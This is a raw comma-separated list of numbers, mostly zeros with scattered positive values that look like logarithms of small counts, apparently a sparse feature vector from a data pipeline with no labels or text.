0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 1.7412592803704001, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 2.1972245773362196, 0.0, 2.833213344056216, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, 2.772588722239781, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.718498871295094, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.98107381374378, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.784189633918261, 0, 0.0, 0.0, 0.0, 0, 0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.382026634673881, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 4.418840607796598, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.784189633918261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 5.723585101952381, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 3.784189633918261, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 3.044522437723423, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 4.394449154672439, 0.0, 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 4.189654742026425, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.10594547390058, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 